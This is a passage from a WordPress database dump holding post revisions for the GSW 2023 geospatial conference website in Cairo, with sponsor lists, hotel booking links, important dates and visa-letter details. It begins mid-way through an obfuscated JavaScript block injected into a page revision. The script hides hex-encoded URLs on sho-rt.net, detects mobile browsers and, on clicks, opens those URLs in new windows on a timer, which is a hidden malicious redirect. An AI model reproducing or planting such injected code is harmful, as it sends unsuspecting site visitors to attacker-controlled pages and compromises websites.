_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-13 21:37:00','2023-06-13 21:37:00','',3066,'https://gsw2023.com/?p=4684',0,'revision','',0),
(4685,1,'2023-06-13 21:38:52','2023-06-13 21:38:52','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#686868\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><strong>-Camera ready paper submission: July 15, 2023</strong></h5>\n</li>\n</ul>\n<h5 style=\"text-align: center;\"></h5>\n<ul style=\"text-align: center;\">\n<li style=\"text-align: left;\">\n<h5><strong>-Deadline for submission of travel grants                                           funded by </strong><strong style=\"text-align: center;\">The ISPRS Foundation is: June 16, 2023</strong></h5>\n</li>\n</ul>\n<h5 style=\"text-align: center;\"></h5>\n<ul>\n<li style=\"text-align: left;\">\n<h5><strong>-Early bird registration deadline: July 1, 2023</strong></h5>\n</li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" button_alignment=\"btn_center\" css=\".vc_custom_1686689514453{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]&nbsp;</p>\n<ul>\n<li style=\"text-align: left;\"><strong>Camera ready paper submission: July 15, 2023 </strong></li>\n<li style=\"text-align: left;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></li>\n<li style=\"text-align: left;\"><strong>Early bird registration deadline: July 1, 2023</strong></li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation Letter</strong></span></h2>\n<p><span style=\"color: #ffffff;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></p>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\">Get Your Invitation letter</a></span></strong></h5>\n<p><span style=\"color: #ffffff;\"><strong> </strong></span></p>\n<p><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></p>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" 